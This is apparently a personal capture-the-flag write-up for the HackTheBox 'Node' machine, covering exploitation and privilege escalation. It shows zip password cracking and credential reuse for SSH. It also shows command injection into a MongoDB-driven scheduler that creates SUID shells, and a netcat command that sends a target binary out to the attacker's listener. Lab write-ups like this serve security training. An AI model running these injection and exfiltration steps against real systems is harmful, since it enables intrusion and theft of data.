Exploitation

Logging in with found Credentials

Downloading the file and trying to read it shows us that it is base64. decoding the file with a different name shows us that the file is a zip file and trying to unzip the file shows us that it needs a password. These are the following commands to get this done.

less [file name] 
base64 -d [filename] > [new file name]
file [new file name]
unzip [new file name]

The file needs a password, therefore we're going to brute force the zip file using fcrackzip

kali@kali:~/HTB/node$ fcrackzip -D -p /usr/share/wordlists/rockyou.txt test.zip 
possible pw found: magicword ()

password is magicword

Found source code

While analyzing the source code, something that we want to do is a find a password we can search for passwords by typing the following command

kali@kali:~/HTB/node/var/www/myplace$ grep -Ri password
grep -Ri password . //specifies in current directory and list everything
grep -Ri password . | less /less output, easier to read.

After looking through the source code not much stood out, but we did notice that it ran mongodb

In order to figure out where the mongo connection is controlled, we can look at app.js

less app.js
/mongo

Found Username and password

Username: mark
Password: 5AYRft73VtFpc84k

Initial Access

After obtaing mongo db password, we attempt to SSH and it worked. Mark was using the same credentials for SSH and MongoDB. Bad practice Mark, bad practice.

Pivoting to TOM

After running LinEnum.sh somthing that stood out is teh running process running as tom.

Node scheduler running as tom. looking at it

Reading that file we are able to find credentials. The script takes everything in the task selection and passes it through exec.

username: mark
password: 5AYRft73VtFpc84k

PrivEsc to Tom User

mongo -p -u mark scheduler
>db.tasks
>db.tasks.in
>db.tasks.insert( { "cmd" : "cp /bin/dash /tmp/boomer; chmod 6755 /bin/dash;" } )
>db.tasks.find()

ls -la /tmp/boomer

That first one did not work, however retyping with different stickbits (hope thats right) we are able to escalate to tom

mark@node:/dev/shm$ mongo -p -u mark scheduler 
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks.in
scheduler.tasks.in
> db.tasks.insert ( { "cmd" : "chmod u+s /tmp/boomer" } )
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:27:25.393+0100 E QUERY    [thread1] TypeError: db.find is not a function :
@(shell):1:1

> db.tasks.find()
> ^C
bye
mark@node:/dev/shm$ ls -la /tmp/boomer
-rwsr-xr-x 1 tom tom 154072 Oct 15 14:20 /tmp/boomer
mark@node:/dev/shm$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) groups=1001(mark)
$ whoami
tom
$

It would be ideal in this case to drop an ssh key so you can login as tom, unfortanetley, we don't have permissions to do so. So we will run LinEnum on it once more to see if we have any other findings.

PrivEsc to admin group

After running a more thourough nmap scan, we are able to look at the SUID's.

bash LinEnum.sh -t

something that stood out:

looks to be owned by root and is in the admin group. To PrivEsc into the admin group we will have to go through mongo db.

$ mongo -p -u mark scheduler 
MongoDB shell version: 3.2.16
Enter password: 
connecting to: scheduler
> db.tasks
scheduler.tasks
> db.tasks.insert( { "cmd" : "chown tom:admin /tmp/boomer; chmod 6755 /tmp/boomer;" } ) 
WriteResult({ "nInserted" : 1 })
> db.find()
2020-10-15T14:56:39.165+0100 E QUERY    [thread1] TypeError: db.find is not a function :
@(shell):1:1

> db.tasks.find()
> ^C
bye
$ /tmp/boomer -p
$ id
uid=1001(mark) gid=1001(mark) euid=1000(tom) egid=1002(admin) groups=1002(admin),1001(mark)
$

Successful PrivEsc of group. Now that we are in the admin group we can acess usr/local/bin/backup we will use netcat to transfer since this is a big boi.

On our machine set up a listner as so.

nc -lvnp 8081 > backup

On the target machine:

nc [ip] [port] < /usr/local/bin/backup <--This is the file we are going to transfer.

Analyzing Backup Binary File

strace ./backup // nothing intersting

kali@kali:~/HTB/node$ r2 backup 
[0x08048780]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
>aaa
>afl prints out function
>vvv visualization mode

PreviousScanning and Enumeration NextSolidState

Last updated 5 years ago

hashtagLogging in with found Credentials

hashtagFound source code

hashtagFound Username and password

hashtagInitial Access

hashtagPivoting to TOM

hashtagPrivEsc to Tom User

hashtagPrivEsc to admin group

hashtagAnalyzing Backup Binary File